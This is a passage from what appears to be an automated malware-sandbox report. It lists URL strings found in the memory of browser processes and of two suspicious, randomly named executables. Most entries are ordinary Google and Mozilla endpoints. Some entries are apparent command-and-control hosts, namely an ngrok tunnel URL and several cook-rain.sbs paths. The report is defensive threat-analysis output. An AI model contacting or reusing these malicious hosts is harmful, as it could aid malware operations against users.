Source: firefox.exe, 0000001D.00000003.2870531926.0000019956B39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2870686349.0000019952739000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2872052743.0000019956B4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2870686349.0000019952746000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2869715582.0000019952739000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3373440180.000002087B49B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: cfc45d1c7c.exe, 0000000A.00000003.2718578101.0000000005A70000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2895412908.0000000005A65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: cfc45d1c7c.exe, 0000000A.00000003.2718578101.0000000005A70000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2895412908.0000000005A65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: chrome.exe, 00000010.00000002.2872669893.0000481C02C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: cfc45d1c7c.exe, 0000000A.00000003.2718578101.0000000005A70000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2895412908.0000000005A65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: cfc45d1c7c.exe, 0000000A.00000003.2718578101.0000000005A70000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2895412908.0000000005A65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3097355714.00000208775CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000010.00000002.2844792331.0000481C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: chrome.exe, 00000010.00000002.2862869312.0000481C025C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000010.00000002.2845071498.0000481C022B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000010.00000002.2845071498.0000481C022B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000010.00000002.2845071498.0000481C022B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000010.00000002.2844792331.0000481C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000010.00000002.2862479717.0000481C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2869050760.0000481C029B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2901520379.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2864618526.0000481C026F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000010.00000002.2869130855.0000481C029CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icoH
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000010.00000002.2844042518.0000481C02254000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: cfc45d1c7c.exe, 0000000A.00000003.2669887119.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2831456627.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830318335.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2830718067.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2844792331.0000481C0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000010.00000002.2872551577.0000481C02C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000010.00000002.2872092712.0000481C02BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000010.00000002.2836020214.000014780078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788824550.0000147800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000010.00000003.2787989377.0000147800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2838782961.000014780080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2788263759.000014780039C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000010.00000003.2783736968.00006628002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2783692557.00006628002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000010.00000002.2866233135.0000481C02824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867325174.0000481C028C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2865803429.0000481C027CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2868443298.0000481C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2794018993.0000481C02638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2843943680.0000481C0221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867701402.0000481C028F2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2865921179.0000481C027E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2867422206.0000481C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000010.00000002.2857620150.0000481C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxH
Source: chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000010.00000002.2871330890.0000481C02B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000010.00000002.2868360398.0000481C02960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000010.00000002.2856474789.0000481C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000010.00000002.2866381760.0000481C02844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000003.2841469664.0000019955000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842626549.000001995525A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2842327005.000001995523C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2841937085.000001995521F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2843820259.0000019955277000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2901520379.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2929336192.000001994D4CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2928726607.000001B63A0CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000002.3074999272.00000208774AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001F.00000002.2939748977.000001994D580000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2927063316.000001B639F30000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2942020606.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2825989028.00000000013B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/
Source: cfc45d1c7c.exe, 0000000C.00000003.2967887265.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2965707647.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000C.00000003.2964412218.00000000013CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/)
Source: cfc45d1c7c.exe, 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs//w
Source: cfc45d1c7c.exe, 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, cfc45d1c7c.exe, 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/3n9
